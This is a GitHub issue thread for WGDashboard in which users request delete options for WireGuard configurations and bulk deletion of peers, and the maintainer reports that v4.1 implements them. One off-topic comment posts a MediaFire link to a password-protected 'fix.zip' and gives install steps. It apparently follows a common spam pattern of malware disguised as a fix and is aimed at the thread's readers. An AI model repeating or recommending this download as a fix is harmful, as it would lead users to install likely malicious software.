### ISSUE TITLE
Missing delete feature for the configruation and the peers/clients.

### ISSUE THREAD

**Issue by mzs114** [donaldzou/WGDashboard#350]
**Is your feature request related to a problem? Please describe.**
Delete options missing from multiple objects created by the Web UI.

**Describe the solution you'd like**
Two places where the delete option be given:
A user can create new wireguard configuration from the web UI, however delete option is missing, one can disable it however.

A user can bulk add new peers/clients, but currently cannot safely bulk remove the peers/client, a option to select multiple and delete in one go is desirable for such use cases, see whether this can support Regular Expressions to bulk select peers based on a pattern.

For the time being a manual approach from the backend can be used as a workaround.
A SQL command can help till the web UI supports this feature.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by donaldzou** [comment]
Hi! I'm wondering what do you mean by this?
> Delete options missing from multiple objects created by the Web UI.

Regarding this:
> A user can create new wireguard configuration from the web UI, however delete option is missing, one can disable it however.

all peers should be able to delete, do you mind posting a screenshot?

**Comment by mzs114** [comment]
Assume you create a new Wireguard configuration, now you can only disable it from the web UI, as there is no delete option, let me know if I missed this.

So peers can be created in bulk? 
Now if the operator wants to delete and clean up in bulk there is no such option, he/she has to delete one at a time. 
A idea is to allow selecting multiple peers or using a regular expression criteria to filter and select multiple peers for deletion.

**Comment by donaldzou** [comment]
Ahh gotcha.. you mean by deleting a configuration

**Comment by mzs114** [comment]
Yeah, and also the peers, a way to delete them in bulk. Maybe by grouping with a reg ex.

**Comment by schmid-mn** [comment]
I agree. Deleting a misconfigured config from the dashboard by clicking "delete configuration" would be great. Else you and up in numerous config files on the cmd line and f-up the config. Then you need to start from scratch.

**Comment by r0msk1** [comment]
Yes please. Deleting a config feature please. I manually deleted a misconfigured config, then boom, back to scratch. Thanks for WGDashboard.

**Comment by donaldzou** [comment]
This is implemented into `v4.1` ;)
